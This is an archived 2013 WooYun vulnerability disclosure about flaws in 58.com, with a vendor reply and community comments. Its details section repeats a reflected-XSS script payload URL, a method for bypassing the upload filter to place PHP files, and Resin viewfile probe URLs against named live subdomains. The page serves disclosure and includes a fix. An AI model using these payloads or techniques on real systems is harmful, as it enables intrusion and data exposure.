当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021407

漏洞标题:58同城漏洞大集合(任意上传,Resin远程文件等)

相关厂商:58同城

漏洞作者: 健宇

提交时间:2013-04-08 19:05

修复时间:2013-05-23 19:06

公开时间:2013-05-23 19:06

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-08: 细节已通知厂商并且等待厂商处理中
2013-04-08: 厂商已经确认,细节仅向厂商公开
2013-04-18: 细节向核心白帽子及相关领域专家公开
2013-04-28: 细节向普通白帽子公开
2013-05-08: 细节向实习白帽子公开
2013-05-23: 细节向公众公开

简要描述:

58同城漏洞大集合,包含任意上传,XSS,Resin远程文件及路径泄露漏洞。

详细说明:

http://post.58.com/1/35/s5?vid=330</script><script>alert(8454051)</script>
存在xss漏洞,在该页能看到上传图片选项,点击上传一张图片截包,改包可以定义修改上传的目录名以及后缀名为php

.jpg


.jpg


下面是XSS集合

xss1.jpg


xss2.jpg


xss3.jpg


xss4.jpg


下面是Resin远程文件及路径泄露漏洞
http://user.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://58.wap.ifeng.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://3ging.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://tools.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://sohu.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml

漏洞证明:

http://post.58.com/1/35/s5?vid=330</script><script>alert(8454051)</script>
存在xss漏洞,在该页能看到上传图片选项,点击上传一张图片截包,改包可以定义修改上传的目录名以及后缀名为php

.jpg


.jpg


下面是XSS集合

xss1.jpg


xss2.jpg


xss3.jpg


xss4.jpg


下面是Resin远程文件及路径泄露漏洞
http://user.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://58.wap.ifeng.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://3ging.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://tools.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml
http://sohu.wap.58.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml

修复方案:

上传文件格式在服务端进行验证,上传目录也在服务端自动根据时间生成,而不是客户端可自定义的。过滤提交参数修补xss漏洞。

版权声明:转载请注明来源 健宇@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-04-08 19:16

厂商回复:

感谢提交,所报的漏洞已经经过内部或者外部发现,感谢大家对58的关注!

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-08 19:07 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    58今天火了啊。。。

  2. 2013-04-08 19:09 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    今天是不是错过了什么节目...

  3. 2013-04-08 19:15 | Clar ( 路人 | Rank:5 漏洞数:2 | 当前无)

    @健宇 看来 你是蹦着 58的职位去的

  4. 2013-04-08 19:16 | 健宇 ( 普通白帽子 | Rank:131 漏洞数:12 | tools kid)

    @Clar 不是,我一个月200元我会看得上8K一个月吗?

  5. 2013-04-08 19:22 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @健宇 果然是世外高人!

  6. 2013-04-08 19:23 | 党中央 ( 路人 | Rank:24 漏洞数:4 | 中国共产党全国代表大会产生的中央权力机构...)

    为自由而战!

  7. 2013-04-08 19:34 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @健宇 不知道是不是几年前的老朋友百合和五八都悲剧,怎么没看到主办大街悲剧呢。。

  8. 2013-04-08 19:59 | 健宇 ( 普通白帽子 | Rank:131 漏洞数:12 | tools kid)

    @0x0F 是我,凌风

  9. 2013-04-08 20:26 | d3pT1 ( 路人 | Rank:1 漏洞数:2 | 人法地,地法天,天法道,道法自然。)

    留名 月薪最起码 80K啊

  10. 2013-04-08 20:29 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @健宇 好久不见啊,最近搞嘛呢

  11. 2013-04-08 20:32 | d3pT1 ( 路人 | Rank:1 漏洞数:2 | 人法地,地法天,天法道,道法自然。)

    @党中央 这名字都能有 碉堡了

  12. 2013-04-08 20:35 | 健宇 ( 普通白帽子 | Rank:131 漏洞数:12 | tools kid)

    @0x0F 爬山,骑自行车,打球,睡觉。

  13. 2013-04-08 20:55 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    所报的漏洞已经经过内部发现

  14. 2013-04-08 20:58 | liyang ( 路人 | Rank:25 漏洞数:10 | 低调 沉默 守望)

    哎~~漏洞已经被那个天才发现了啊~~

  15. 2013-04-08 21:31 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    试了半天,任意上传.失败了。。。

  16. 2013-04-08 21:31 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    不过漏洞大集合才5rank,似乎有些不给力啊。。。

  17. 2013-04-08 21:53 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @健宇 真特么悠闲啊。。。

  18. 2013-04-08 22:46 | 梦想肥羊 ( 实习白帽子 | Rank:89 漏洞数:18 | 博客:dnswalk.blog.163.com)

    看这rank给的....

  19. 2013-04-08 22:55 | 健宇 ( 普通白帽子 | Rank:131 漏洞数:12 | tools kid)

    @鱼化石 我今天让朋友告知过58这些漏洞再发这的

  20. 2013-04-08 23:24 | El4pse ( 路人 | Rank:29 漏洞数:7 | 世界上从来没有不可能这几个字,可不可能完...)

    看到rank我石化了

  21. 2013-04-09 00:21 | 小马 ( 实习白帽子 | Rank:90 漏洞数:21 | 无个性不签名)

    今天都比较关注那个视频

  22. 2013-04-09 00:47 | 0x00de ( 路人 | Rank:8 漏洞数:6 | 一个二逼,2到家了的小白。)

    58火了

  23. 2013-04-09 01:23 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    噗。。。

  24. 2013-04-09 02:08 | 陌路 ( 路人 | Rank:8 漏洞数:4 | 安全爱好者!)

    今天58节操真的很弱暴了

  25. 2013-04-09 05:09 | 黑色 ( 路人 | Rank:17 漏洞数:1 | 计算机爱好者)

    58 带出了一个后台哥

  26. 2013-04-09 09:45 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    合集才5rank?是不是那个主角评分的?那太可以了,他发现后台是800rank,这个都上传了才5rank

  27. 2013-04-09 09:52 | El4pse ( 路人 | Rank:29 漏洞数:7 | 世界上从来没有不可能这几个字,可不可能完...)

    @wefgod 渠道决定rank

  28. 2013-04-09 10:16 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    @El4pse 哈哈确实,有理

  29. 2013-04-09 11:22 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    笑屎58这坨粑粑。

  30. 2013-04-09 13:40 | Max ( 实习白帽子 | Rank:45 漏洞数:7 | When you see this sentence, I have been ...)

    @momo 噗。。。这坨粑粑

  31. 2013-04-09 20:32 | 小土豆 ( 普通白帽子 | Rank:129 漏洞数:22 )

    王鑫 火了 。。。。。

  32. 2013-05-08 21:27 | 影刺 ( 实习白帽子 | Rank:67 漏洞数:25 | 关注web安全)

    58今年TOP1